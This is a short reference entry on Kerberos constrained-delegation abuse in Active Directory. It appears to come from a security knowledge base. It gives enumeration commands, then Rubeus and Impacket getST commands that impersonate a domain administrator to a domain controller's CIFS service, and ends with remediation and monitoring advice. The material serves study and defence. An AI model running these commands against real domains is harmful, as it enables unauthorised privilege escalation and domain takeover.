Constrained Delegation Abuse

Description

Constrained delegation limits which services a principal can impersonate to, but misconfigurations still enable privilege escalation. If attackers control a delegated service account, they can use S4U2Self (obtain a service ticket to themselves) and S4U2Proxy (obtain a service ticket to another service) to impersonate higher‑privileged users to allowed SPNs (e.g., CIFS, LDAP, MSSQL) and access sensitive resources. If “Use any authentication protocol” (protocol transition) is enabled (TrustedToAuthForDelegation), attackers don’t even need the user’s password to impersonate them.

Examples

Enumerate Delegation Configuration

List principals that can delegate and their targets:

# PowerView
Get-DomainUser -TrustedToAuth | Select SamAccountName, msDS-AllowedToDelegateTo, UserAccountControl
Get-DomainComputer -TrustedToAuth | Select DnsHostName, msDS-AllowedToDelegateTo

# Native AD module (example for a specific account)
Get-ADUser svc_web -Properties msDS-AllowedToDelegateTo,TrustedToAuthForDelegation

Abuse S4U with Rubeus

If you have the service account’s key (password/hash) and protocol transition is allowed, impersonate a target user to a delegated SPN:

Rubeus s4u /user:svc_web /rc4:0123456789abcdef0123456789abcdef \
  /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /ptt

This injects a ticket for Administrator to the CIFS service on the domain controller.

Alternate abuse path with Kekeo/Impacket

# With Impacket getST (protocol transition + S4U2Proxy)
getST.py -dc-ip 10.0.0.10 -spn cifs/dc01.corp.local -impersonate Administrator corp.local/svc_web:'SvcPassword!'
export KRB5CCNAME=Administrator.ccache

Use the ticket to access the allowed service (SMB/LDAP/MSSQL) on the target.

Remediation

  1. Minimise and harden delegation
    • Avoid delegating to Tier 0 services (e.g., DCs, LDAP on DCs).
    • Restrict msDS-AllowedToDelegateTo to the minimum necessary SPNs.
  2. Prefer safer patterns
    • Use RBCD with machine accounts when feasible; avoid protocol transition unless required.
    • Move workloads to gMSA/MSA and remove interactive logon rights.
  3. Monitor and review
    • Alert on changes to delegation attributes and unusual S4U traffic (event 4769).
    • Periodically validate that delegated accounts reside outside high‑privilege tiers.